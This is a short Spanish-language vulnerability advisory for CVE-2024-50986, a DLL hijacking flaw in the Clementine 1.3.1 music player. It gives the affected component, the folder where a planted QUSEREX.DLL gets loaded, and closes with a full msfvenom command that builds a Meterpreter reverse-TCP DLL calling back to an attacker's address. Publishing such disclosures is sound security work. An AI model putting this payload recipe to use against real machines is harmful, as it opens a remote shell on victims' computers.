
Una vulnerabilidad en Clementine v.1.3.1 permite a un atacante local ejecutar código arbitrario mediante un archivo DLL manipulado (DLL Hijacking)
Descripción: Un problema en Clementine v.1.3.1 permite a un atacante local ejecutar código arbitrario mediante un archivo DLL manipulado.
Versión afectada: Clementine v.1.3.1
Investigador: Utkarsh (r1971d3) LinkedIn
Enlace NIST CVE: https://nvd.nist.gov/vuln/detail/CVE-2024-50986
Tipo de vulnerabilidad: Ruta de búsqueda no confiable
Componente afectado: QUSEREX.DLL
Para explotar esta vulnerabilidad, un atacante debe crear un DLL malicioso llamado QUSEREX.DLL y colocarlo en el directorio: C:\Users<username>\AppData\Local\Microsoft\WindowsApps. Cuando se inicia la aplicación Clementine, cargará el DLL malicioso, ejecutando el código del atacante.


sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL



